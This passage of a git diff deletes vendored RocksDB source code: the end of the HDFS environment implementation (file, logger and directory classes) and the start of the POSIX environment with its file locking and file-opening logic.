-  // returns true if we are at the end of file, false otherwise
-  bool feof() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile feof %s\n",
-                    filename_.c_str());
-    if (hdfsTell(fileSys_, hfile_) == fileSize()) {
-      return true;
-    }
-    return false;
-  }
-
-  // the current size of the file
-  tOffset fileSize() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile fileSize %s\n",
-                    filename_.c_str());
-    hdfsFileInfo* pFileInfo = hdfsGetPathInfo(fileSys_, filename_.c_str());
-    tOffset size = 0L;
-    if (pFileInfo != nullptr) {
-      size = pFileInfo->mSize;
-      hdfsFreeFileInfo(pFileInfo, 1);
-    } else {
-      throw HdfsFatalException("fileSize on unknown file " + filename_);
-    }
-    return size;
-  }
-};
-
-// Appends to an existing file in HDFS.
-class HdfsWritableFile: public WritableFile {
- private:
-  hdfsFS fileSys_;
-  std::string filename_;
-  hdfsFile hfile_;
-
- public:
-  HdfsWritableFile(hdfsFS fileSys, const std::string& fname)
-      : fileSys_(fileSys), filename_(fname) , hfile_(nullptr) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile opening %s\n",
-                    filename_.c_str());
-    hfile_ = hdfsOpenFile(fileSys_, filename_.c_str(), O_WRONLY, 0, 0, 0);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile opened %s\n",
-                    filename_.c_str());
-    assert(hfile_ != nullptr);
-  }
-  virtual ~HdfsWritableFile() {
-    if (hfile_ != nullptr) {
-      ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closing %s\n",
-                      filename_.c_str());
-      hdfsCloseFile(fileSys_, hfile_);
-      ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closed %s\n",
-                      filename_.c_str());
-      hfile_ = nullptr;
-    }
-  }
-
-  // If the file was successfully created, then this returns true.
-  // Otherwise returns false.
-  bool isValid() {
-    return hfile_ != nullptr;
-  }
-
-  // The name of the file, mostly needed for debug logging.
-  const std::string& getName() {
-    return filename_;
-  }
-
-  virtual Status Append(const Slice& data) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Append %s\n",
-                    filename_.c_str());
-    const char* src = data.data();
-    size_t left = data.size();
-    size_t ret = hdfsWrite(fileSys_, hfile_, src, left);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Appended %s\n",
-                    filename_.c_str());
-    if (ret != left) {
-      return IOError(filename_, errno);
-    }
-    return Status::OK();
-  }
-
-  virtual Status Flush() {
-    return Status::OK();
-  }
-
-  virtual Status Sync() {
-    Status s;
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Sync %s\n",
-                    filename_.c_str());
-    if (hdfsFlush(fileSys_, hfile_) == -1) {
-      return IOError(filename_, errno);
-    }
-    if (hdfsHSync(fileSys_, hfile_) == -1) {
-      return IOError(filename_, errno);
-    }
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile Synced %s\n",
-                    filename_.c_str());
-    return Status::OK();
-  }
-
-  // This is used by HdfsLogger to write data to the debug log file
-  virtual Status Append(const char* src, size_t size) {
-    if (hdfsWrite(fileSys_, hfile_, src, size) != (tSize)size) {
-      return IOError(filename_, errno);
-    }
-    return Status::OK();
-  }
-
-  virtual Status Close() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closing %s\n",
-                    filename_.c_str());
-    if (hdfsCloseFile(fileSys_, hfile_) != 0) {
-      return IOError(filename_, errno);
-    }
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closed %s\n",
-                    filename_.c_str());
-    hfile_ = nullptr;
-    return Status::OK();
-  }
-};
-
-// The object that implements the debug logs to reside in HDFS.
-class HdfsLogger : public Logger {
- private:
-  HdfsWritableFile* file_;
-  uint64_t (*gettid_)();  // Return the thread id for the current thread
-
- public:
-  HdfsLogger(HdfsWritableFile* f, uint64_t (*gettid)())
-      : file_(f), gettid_(gettid) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsLogger opened %s\n",
-                    file_->getName().c_str());
-  }
-
-  virtual ~HdfsLogger() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsLogger closed %s\n",
-                    file_->getName().c_str());
-    delete file_;
-    if (mylog != nullptr && mylog == this) {
-      mylog = nullptr;
-    }
-  }
-
-  virtual void Logv(const char* format, va_list ap) {
-    const uint64_t thread_id = (*gettid_)();
-
-    // We try twice: the first time with a fixed-size stack allocated buffer,
-    // and the second time with a much larger dynamically allocated buffer.
-    char buffer[500];
-    for (int iter = 0; iter < 2; iter++) {
-      char* base;
-      int bufsize;
-      if (iter == 0) {
-        bufsize = sizeof(buffer);
-        base = buffer;
-      } else {
-        bufsize = 30000;
-        base = new char[bufsize];
-      }
-      char* p = base;
-      char* limit = base + bufsize;
-
-      struct timeval now_tv;
-      gettimeofday(&now_tv, nullptr);
-      const time_t seconds = now_tv.tv_sec;
-      struct tm t;
-      localtime_r(&seconds, &t);
-      p += snprintf(p, limit - p,
-                    "%04d/%02d/%02d-%02d:%02d:%02d.%06d %llx ",
-                    t.tm_year + 1900,
-                    t.tm_mon + 1,
-                    t.tm_mday,
-                    t.tm_hour,
-                    t.tm_min,
-                    t.tm_sec,
-                    static_cast<int>(now_tv.tv_usec),
-                    static_cast<long long unsigned int>(thread_id));
-
-      // Print the message
-      if (p < limit) {
-        va_list backup_ap;
-        va_copy(backup_ap, ap);
-        p += vsnprintf(p, limit - p, format, backup_ap);
-        va_end(backup_ap);
-      }
-
-      // Truncate to available space if necessary
-      if (p >= limit) {
-        if (iter == 0) {
-          continue;       // Try again with larger buffer
-        } else {
-          p = limit - 1;
-        }
-      }
-
-      // Add newline if necessary
-      if (p == base || p[-1] != '\n') {
-        *p++ = '\n';
-      }
-
-      assert(p <= limit);
-      file_->Append(base, p-base);
-      file_->Flush();
-      if (base != buffer) {
-        delete[] base;
-      }
-      break;
-    }
-  }
-};
-
-}  // namespace
-
-// Finally, the hdfs environment
-
-const std::string HdfsEnv::kProto = "hdfs://";
-const std::string HdfsEnv::pathsep = "/";
-
-// open a file for sequential reading
-Status HdfsEnv::NewSequentialFile(const std::string& fname,
-                                  unique_ptr<SequentialFile>* result,
-                                  const EnvOptions& options) {
-  result->reset();
-  HdfsReadableFile* f = new HdfsReadableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  result->reset(dynamic_cast<SequentialFile*>(f));
-  return Status::OK();
-}
-
-// open a file for random reading
-Status HdfsEnv::NewRandomAccessFile(const std::string& fname,
-                                    unique_ptr<RandomAccessFile>* result,
-                                    const EnvOptions& options) {
-  result->reset();
-  HdfsReadableFile* f = new HdfsReadableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  result->reset(dynamic_cast<RandomAccessFile*>(f));
-  return Status::OK();
-}
-
-// create a new file for writing
-Status HdfsEnv::NewWritableFile(const std::string& fname,
-                                unique_ptr<WritableFile>* result,
-                                const EnvOptions& options) {
-  result->reset();
-  Status s;
-  HdfsWritableFile* f = new HdfsWritableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  result->reset(dynamic_cast<WritableFile*>(f));
-  return Status::OK();
-}
-
-class HdfsDirectory : public Directory {
- public:
-  explicit HdfsDirectory(int fd) : fd_(fd) {}
-  ~HdfsDirectory() {}
-
-  virtual Status Fsync() { return Status::OK(); }
-
- private:
-  int fd_;
-};
-
-Status HdfsEnv::NewDirectory(const std::string& name,
-                             unique_ptr<Directory>* result) {
-  int value = hdfsExists(fileSys_, name.c_str());
-  switch (value) {
-    case HDFS_EXISTS:
-      result->reset(new HdfsDirectory(0));
-      return Status::OK();
-    default:  // fail if the directory doesn't exist
-      ROCKS_LOG_FATAL(mylog, "NewDirectory hdfsExists call failed");
-      throw HdfsFatalException("hdfsExists call failed with error " +
-                               ToString(value) + " on path " + name +
-                               ".\n");
-  }
-}
-
-Status HdfsEnv::FileExists(const std::string& fname) {
-  int value = hdfsExists(fileSys_, fname.c_str());
-  switch (value) {
-    case HDFS_EXISTS:
-      return Status::OK();
-    case HDFS_DOESNT_EXIST:
-      return Status::NotFound();
-    default:  // anything else should be an error
-      ROCKS_LOG_FATAL(mylog, "FileExists hdfsExists call failed");
-      return Status::IOError("hdfsExists call failed with error " +
-                             ToString(value) + " on path " + fname + ".\n");
-  }
-}
-
-Status HdfsEnv::GetChildren(const std::string& path,
-                            std::vector<std::string>* result) {
-  int value = hdfsExists(fileSys_, path.c_str());
-  switch (value) {
-    case HDFS_EXISTS: {  // directory exists
-    int numEntries = 0;
-    hdfsFileInfo* pHdfsFileInfo = 0;
-    pHdfsFileInfo = hdfsListDirectory(fileSys_, path.c_str(), &numEntries);
-    if (numEntries >= 0) {
-      for(int i = 0; i < numEntries; i++) {
-        char* pathname = pHdfsFileInfo[i].mName;
-        char* filename = std::rindex(pathname, '/');
-        if (filename != nullptr) {
-          result->push_back(filename+1);
-        }
-      }
-      if (pHdfsFileInfo != nullptr) {
-        hdfsFreeFileInfo(pHdfsFileInfo, numEntries);
-      }
-    } else {
-      // numEntries < 0 indicates error
-      ROCKS_LOG_FATAL(mylog, "hdfsListDirectory call failed with error ");
-      throw HdfsFatalException(
-          "hdfsListDirectory call failed negative error.\n");
-    }
-    break;
-  }
-  case HDFS_DOESNT_EXIST:  // directory does not exist, exit
-    return Status::NotFound();
-  default:          // anything else should be an error
-    ROCKS_LOG_FATAL(mylog, "GetChildren hdfsExists call failed");
-    throw HdfsFatalException("hdfsExists call failed with error " +
-                             ToString(value) + ".\n");
-  }
-  return Status::OK();
-}
-
-Status HdfsEnv::DeleteFile(const std::string& fname) {
-  if (hdfsDelete(fileSys_, fname.c_str(), 1) == 0) {
-    return Status::OK();
-  }
-  return IOError(fname, errno);
-};
-
-Status HdfsEnv::CreateDir(const std::string& name) {
-  if (hdfsCreateDirectory(fileSys_, name.c_str()) == 0) {
-    return Status::OK();
-  }
-  return IOError(name, errno);
-};
-
-Status HdfsEnv::CreateDirIfMissing(const std::string& name) {
-  const int value = hdfsExists(fileSys_, name.c_str());
-  //  Not atomic. state might change b/w hdfsExists and CreateDir.
-  switch (value) {
-    case HDFS_EXISTS:
-    return Status::OK();
-    case HDFS_DOESNT_EXIST:
-    return CreateDir(name);
-    default:  // anything else should be an error
-      ROCKS_LOG_FATAL(mylog, "CreateDirIfMissing hdfsExists call failed");
-      throw HdfsFatalException("hdfsExists call failed with error " +
-                               ToString(value) + ".\n");
-  }
-};
-
-Status HdfsEnv::DeleteDir(const std::string& name) {
-  return DeleteFile(name);
-};
-
-Status HdfsEnv::GetFileSize(const std::string& fname, uint64_t* size) {
-  *size = 0L;
-  hdfsFileInfo* pFileInfo = hdfsGetPathInfo(fileSys_, fname.c_str());
-  if (pFileInfo != nullptr) {
-    *size = pFileInfo->mSize;
-    hdfsFreeFileInfo(pFileInfo, 1);
-    return Status::OK();
-  }
-  return IOError(fname, errno);
-}
-
-Status HdfsEnv::GetFileModificationTime(const std::string& fname,
-                                        uint64_t* time) {
-  hdfsFileInfo* pFileInfo = hdfsGetPathInfo(fileSys_, fname.c_str());
-  if (pFileInfo != nullptr) {
-    *time = static_cast<uint64_t>(pFileInfo->mLastMod);
-    hdfsFreeFileInfo(pFileInfo, 1);
-    return Status::OK();
-  }
-  return IOError(fname, errno);
-
-}
-
-// The rename is not atomic. HDFS does not allow a renaming if the
-// target already exists. So, we delete the target before attempting the
-// rename.
-Status HdfsEnv::RenameFile(const std::string& src, const std::string& target) {
-  hdfsDelete(fileSys_, target.c_str(), 1);
-  if (hdfsRename(fileSys_, src.c_str(), target.c_str()) == 0) {
-    return Status::OK();
-  }
-  return IOError(src, errno);
-}
-
-Status HdfsEnv::LockFile(const std::string& fname, FileLock** lock) {
-  // there isn's a very good way to atomically check and create
-  // a file via libhdfs
-  *lock = nullptr;
-  return Status::OK();
-}
-
-Status HdfsEnv::UnlockFile(FileLock* lock) {
-  return Status::OK();
-}
-
-Status HdfsEnv::NewLogger(const std::string& fname,
-                          shared_ptr<Logger>* result) {
-  HdfsWritableFile* f = new HdfsWritableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  HdfsLogger* h = new HdfsLogger(f, &HdfsEnv::gettid);
-  result->reset(h);
-  if (mylog == nullptr) {
-    // mylog = h; // uncomment this for detailed logging
-  }
-  return Status::OK();
-}
-
-// The factory method for creating an HDFS Env
-Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) {
-  *hdfs_env = new HdfsEnv(fsname);
-  return Status::OK();
-}
-}  // namespace rocksdb
-
-#endif // ROCKSDB_HDFS_FILE_C
-
-#else // USE_HDFS
-
-// dummy placeholders used when HDFS is not available
-namespace rocksdb {
- Status HdfsEnv::NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) {
-   return Status::NotSupported("Not compiled with hdfs support");
- }
-
- Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) {
-   return Status::NotSupported("Not compiled with hdfs support");
- }
-}
-
-#endif
diff --git a/thirdparty/rocksdb/env/env_posix.cc b/thirdparty/rocksdb/env/env_posix.cc
deleted file mode 100644
index 5a671d7..0000000
--- a/thirdparty/rocksdb/env/env_posix.cc
+++ /dev/null
@@ -1,976 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors
-#include <dirent.h>
-#include <errno.h>
-#include <fcntl.h>
-#if defined(OS_LINUX)
-#include <linux/fs.h>
-#endif
-#include <pthread.h>
-#include <signal.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <sys/stat.h>
-#ifdef OS_LINUX
-#include <sys/statfs.h>
-#include <sys/syscall.h>
-#endif
-#include <sys/time.h>
-#include <sys/types.h>
-#include <time.h>
-#include <algorithm>
-// Get nano time includes
-#if defined(OS_LINUX) || defined(OS_FREEBSD)
-#elif defined(__MACH__)
-#include <mach/clock.h>
-#include <mach/mach.h>
-#else
-#include <chrono>
-#endif
-#include <deque>
-#include <set>
-#include <vector>
-
-#include "env/io_posix.h"
-#include "env/posix_logger.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/thread_status_updater.h"
-#include "port/port.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/logging.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/thread_local.h"
-#include "util/threadpool_imp.h"
-
-#if !defined(TMPFS_MAGIC)
-#define TMPFS_MAGIC 0x01021994
-#endif
-#if !defined(XFS_SUPER_MAGIC)
-#define XFS_SUPER_MAGIC 0x58465342
-#endif
-#if !defined(EXT4_SUPER_MAGIC)
-#define EXT4_SUPER_MAGIC 0xEF53
-#endif
-
-namespace rocksdb {
-
-namespace {
-
-ThreadStatusUpdater* CreateThreadStatusUpdater() {
-  return new ThreadStatusUpdater();
-}
-
-// list of pathnames that are locked
-static std::set<std::string> lockedFiles;
-static port::Mutex mutex_lockedFiles;
-
-static int LockOrUnlock(const std::string& fname, int fd, bool lock) {
-  mutex_lockedFiles.Lock();
-  if (lock) {
-    // If it already exists in the lockedFiles set, then it is already locked,
-    // and fail this lock attempt. Otherwise, insert it into lockedFiles.
-    // This check is needed because fcntl() does not detect lock conflict
-    // if the fcntl is issued by the same thread that earlier acquired
-    // this lock.
-    if (lockedFiles.insert(fname).second == false) {
-      mutex_lockedFiles.Unlock();
-      errno = ENOLCK;
-      return -1;
-    }
-  } else {
-    // If we are unlocking, then verify that we had locked it earlier,
-    // it should already exist in lockedFiles. Remove it from lockedFiles.
-    if (lockedFiles.erase(fname) != 1) {
-      mutex_lockedFiles.Unlock();
-      errno = ENOLCK;
-      return -1;
-    }
-  }
-  errno = 0;
-  struct flock f;
-  memset(&f, 0, sizeof(f));
-  f.l_type = (lock ? F_WRLCK : F_UNLCK);
-  f.l_whence = SEEK_SET;
-  f.l_start = 0;
-  f.l_len = 0;        // Lock/unlock entire file
-  int value = fcntl(fd, F_SETLK, &f);
-  if (value == -1 && lock) {
-    // if there is an error in locking, then remove the pathname from lockedfiles
-    lockedFiles.erase(fname);
-  }
-  mutex_lockedFiles.Unlock();
-  return value;
-}
-
-class PosixFileLock : public FileLock {
- public:
-  int fd_;
-  std::string filename;
-};
-
-class PosixEnv : public Env {
- public:
-  PosixEnv();
-
-  virtual ~PosixEnv() {
-    for (const auto tid : threads_to_join_) {
-      pthread_join(tid, nullptr);
-    }
-    for (int pool_id = 0; pool_id < Env::Priority::TOTAL; ++pool_id) {
-      thread_pools_[pool_id].JoinAllThreads();
-    }
-    // Delete the thread_status_updater_ only when the current Env is not
-    // Env::Default().  This is to avoid the free-after-use error when
-    // Env::Default() is destructed while some other child threads are
-    // still trying to update thread status.
-    if (this != Env::Default()) {
-      delete thread_status_updater_;
-    }
-  }
-
-  void SetFD_CLOEXEC(int fd, const EnvOptions* options) {
-    if ((options == nullptr || options->set_fd_cloexec) && fd > 0) {
-      fcntl(fd, F_SETFD, fcntl(fd, F_GETFD) | FD_CLOEXEC);
-    }
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    int fd = -1;
-    int flags = O_RDONLY;
-    FILE* file = nullptr;
-
-    if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // !ROCKSDB_LITE
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-#endif
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-    if (fd < 0) {
-      return IOError("While opening a file for sequentially reading", fname,
-                     errno);
-    }
-
-    SetFD_CLOEXEC(fd, &options);
-
-    if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef OS_MACOSX
-      if (fcntl(fd, F_NOCACHE, 1) == -1) {
-        close(fd);
-        return IOError("While fcntl NoCache", fname, errno);
-      }
-#endif
-    } else {
-      do {
-        IOSTATS_TIMER_GUARD(open_nanos);
-        file = fdopen(fd, "r");
-      } while (file == nullptr && errno == EINTR);
-      if (file == nullptr) {
-        close(fd);
-        return IOError("While opening file for sequentially read", fname,
-                       errno);
-      }
-    }
-    result->reset(new PosixSequentialFile(fname, file, fd, options));
-    return Status::OK();
-  }
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    result->reset();
-    Status s;
-    int fd;
-    int flags = O_RDONLY;
-    if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // !ROCKSDB_LITE
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-      TEST_SYNC_POINT_CALLBACK("NewRandomAccessFile:O_DIRECT", &flags);
-#endif
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-    if (fd < 0) {
-      return IOError("While open a file for random read", fname, errno);
-    }
-    SetFD_CLOEXEC(fd, &options);
-
-    if (options.use_mmap_reads && sizeof(void*) >= 8) {
-      // Use of mmap for random reads has been removed because it
-      // kills performance when storage is fast.
-      // Use mmap when virtual address-space is plentiful.
-      uint64_t size;
-      s = GetFileSize(fname, &size);
-      if (s.ok()) {
-        void* base = mmap(nullptr, size, PROT_READ, MAP_SHARED, fd, 0);
-        if (base != MAP_FAILED) {
-          result->reset(new PosixMmapReadableFile(fd, fname, base,
-                                                  size, options));
-        } else {
-          s = IOError("while mmap file for read", fname, errno);
-        }
-      }
-      close(fd);
-    } else {
-      if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef OS_MACOSX
-        if (fcntl(fd, F_NOCACHE, 1) == -1) {
-          close(fd);
-          return IOError("while fcntl NoCache", fname, errno);
-        }
-#endif
-      }
-      result->reset(new PosixRandomAccessFile(fname, fd, options));
-    }
-    return s;
-  }
-
-  virtual Status OpenWritableFile(const std::string& fname,
-                                  unique_ptr<WritableFile>* result,
-                                  const EnvOptions& options,
-                                  bool reopen = false) {
-    result->reset();
-    Status s;
-    int fd = -1;
-    int flags = (reopen) ? (O_CREAT | O_APPEND) : (O_CREAT | O_TRUNC);
-    // Direct IO mode with O_DIRECT flag or F_NOCAHCE (MAC OSX)
-    if (options.use_direct_writes && !options.use_mmap_writes) {
-      // Note: we should avoid O_APPEND here due to ta the following bug:
-      // POSIX requires that opening a file with the O_APPEND flag should
-      // have no affect on the location at which pwrite() writes data.
-      // However, on Linux, if a file is opened with O_APPEND, pwrite()
-      // appends data to the end of the file, regardless of the value of
-      // offset.
-      // More info here: https://linux.die.net/man/2/pwrite
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // ROCKSDB_LITE
-      flags |= O_WRONLY;
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-#endif
-      TEST_SYNC_POINT_CALLBACK("NewWritableFile:O_DIRECT", &flags);
-    } else if (options.use_mmap_writes) {
-      // non-direct I/O
-      flags |= O_RDWR;
-    } else {
-      flags |= O_WRONLY;
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-
-    if (fd < 0) {
-      s = IOError("While open a file for appending", fname, errno);
-      return s;
-    }
-    SetFD_CLOEXEC(fd, &options);
-
-    if (options.use_mmap_writes) {
-      if (!checkedDiskForMmap_) {
-        // this will be executed once in the program's lifetime.
-        // do not use mmapWrite on non ext-3/xfs/tmpfs systems.
-        if (!SupportsFastAllocate(fname)) {
-          forceMmapOff_ = true;
-        }
-        checkedDiskForMmap_ = true;
-      }
-    }
-    if (options.use_mmap_writes && !forceMmapOff_) {
-      result->reset(new PosixMmapFile(fname, fd, page_size_, options));
-    } else if (options.use_direct_writes && !options.use_mmap_writes) {
-#ifdef OS_MACOSX
-      if (fcntl(fd, F_NOCACHE, 1) == -1) {
-        close(fd);
-        s = IOError("While fcntl NoCache an opened file for appending", fname,
-                    errno);
-        return s;
-      }
-#elif defined(OS_SOLARIS)
-      if (directio(fd, DIRECTIO_ON) == -1) {
-        if (errno != ENOTTY) { // ZFS filesystems don't support DIRECTIO_ON
-          close(fd);
-          s = IOError("While calling directio()", fname, errno);
-          return s;
-        }
-      }
-#endif
-      result->reset(new PosixWritableFile(fname, fd, options));
-    } else {
-      // disable mmap writes
-      EnvOptions no_mmap_writes_options = options;
-      no_mmap_writes_options.use_mmap_writes = false;
-      result->reset(new PosixWritableFile(fname, fd, no_mmap_writes_options));
-    }
-    return s;
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    return OpenWritableFile(fname, result, options, false);
-  }
-
-  virtual Status ReopenWritableFile(const std::string& fname,
-                                    unique_ptr<WritableFile>* result,
-                                    const EnvOptions& options) override {
-    return OpenWritableFile(fname, result, options, true);
-  }
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    Status s;
-    int fd = -1;
-
-    int flags = 0;
-    // Direct IO mode with O_DIRECT flag or F_NOCAHCE (MAC OSX)
-    if (options.use_direct_writes && !options.use_mmap_writes) {
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // !ROCKSDB_LITE
-      flags |= O_WRONLY;
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-#endif
-      TEST_SYNC_POINT_CALLBACK("NewWritableFile:O_DIRECT", &flags);
-    } else if (options.use_mmap_writes) {
-      // mmap needs O_RDWR mode
-      flags |= O_RDWR;
-    } else {
-      flags |= O_WRONLY;
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(old_fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-    if (fd < 0) {
-      s = IOError("while reopen file for write", fname, errno);
-      return s;
-    }
-
-    SetFD_CLOEXEC(fd, &options);
-    // rename into place
-    if (rename(old_fname.c_str(), fname.c_str()) != 0) {
-      s = IOError("while rename file to " + fname, old_fname, errno);
-      close(fd);
-      return s;
-    }
-
-    if (options.use_mmap_writes) {
-      if (!checkedDiskForMmap_) {
-        // this will be executed once in the program's lifetime.
-        // do not use mmapWrite on non ext-3/xfs/tmpfs systems.
-        if (!SupportsFastAllocate(fname)) {
-          forceMmapOff_ = true;
-        }
-        checkedDiskForMmap_ = true;
-      }
-    }
-    if (options.use_mmap_writes && !forceMmapOff_) {
-      result->reset(new PosixMmapFile(fname, fd, page_size_, options));
-    } else if (options.use_direct_writes && !options.use_mmap_writes) {
-#ifdef OS_MACOSX
-      if (fcntl(fd, F_NOCACHE, 1) == -1) {
-        close(fd);
-        s = IOError("while fcntl NoCache for reopened file for append", fname,
-                    errno);
-        return s;
-      }
-#elif defined(OS_SOLARIS)
-      if (directio(fd, DIRECTIO_ON) == -1) {
-        if (errno != ENOTTY) { // ZFS filesystems don't support DIRECTIO_ON
-          close(fd);
-          s = IOError("while calling directio()", fname, errno);
-          return s;
-        }
-      }
-#endif
-      result->reset(new PosixWritableFile(fname, fd, options));
-    } else {
-      // disable mmap writes
-      EnvOptions no_mmap_writes_options = options;
-      no_mmap_writes_options.use_mmap_writes = false;
-      result->reset(new PosixWritableFile(fname, fd, no_mmap_writes_options));
-    }
-    return s;
-
-    return s;
-  }
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    int fd = -1;
-    while (fd < 0) {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), O_CREAT | O_RDWR, 0644);
-      if (fd < 0) {
-        // Error while opening the file
-        if (errno == EINTR) {
-          continue;
-        }
-        return IOError("While open file for random read/write", fname, errno);
-      }
-    }
-
-    SetFD_CLOEXEC(fd, &options);
-    result->reset(new PosixRandomRWFile(fname, fd, options));
-    return Status::OK();
-  }
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    result->reset();
-    int fd;
-    {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(name.c_str(), 0);
-    }
-    if (fd < 0) {
-      return IOError("While open directory", name, errno);
-    } else {
-      result->reset(new PosixDirectory(fd));
-    }
-    return Status::OK();
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    int result = access(fname.c_str(), F_OK);
-
-    if (result == 0) {
-      return Status::OK();
-    }
-
-    switch (errno) {
-      case EACCES:
-      case ELOOP:
-      case ENAMETOOLONG:
-      case ENOENT:
-      case ENOTDIR:
-        return Status::NotFound();
-      default:
-        assert(result == EIO || result == ENOMEM);
-        return Status::IOError("Unexpected error(" + ToString(result) +
-                               ") accessing file `" + fname + "' ");
-    }
-  }
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    result->clear();
-    DIR* d = opendir(dir.c_str());
-    if (d == nullptr) {
-      switch (errno) {
-        case EACCES:
-        case ENOENT:
-        case ENOTDIR:
-          return Status::NotFound();
-        default:
-          return IOError("While opendir", dir, errno);
-      }
-    }
-    struct dirent* entry;
-    while ((entry = readdir(d)) != nullptr) {
-      result->push_back(entry->d_name);
-    }
-    closedir(d);
-    return Status::OK();
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    Status result;
-    if (unlink(fname.c_str()) != 0) {
-      result = IOError("while unlink() file", fname, errno);
-    }
-    return result;
-  };
-
-  virtual Status CreateDir(const std::string& name) override {
-    Status result;
-    if (mkdir(name.c_str(), 0755) != 0) {
-      result = IOError("While mkdir", name, errno);
-    }
-    return result;
-  };
-
-  virtual Status CreateDirIfMissing(const std::string& name) override {
-    Status result;
-    if (mkdir(name.c_str(), 0755) != 0) {
-      if (errno != EEXIST) {
-        result = IOError("While mkdir if missing", name, errno);
-      } else if (!DirExists(name)) { // Check that name is actually a
-                                     // directory.
-        // Message is taken from mkdir
-        result = Status::IOError("`"+name+"' exists but is not a directory");
-      }
-    }
-    return result;
-  };
-
-  virtual Status DeleteDir(const std::string& name) override {
-    Status result;
-    if (rmdir(name.c_str()) != 0) {
-      result = IOError("file rmdir", name, errno);
-    }
-    return result;
-  };
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* size) override {
-    Status s;
-    struct stat sbuf;
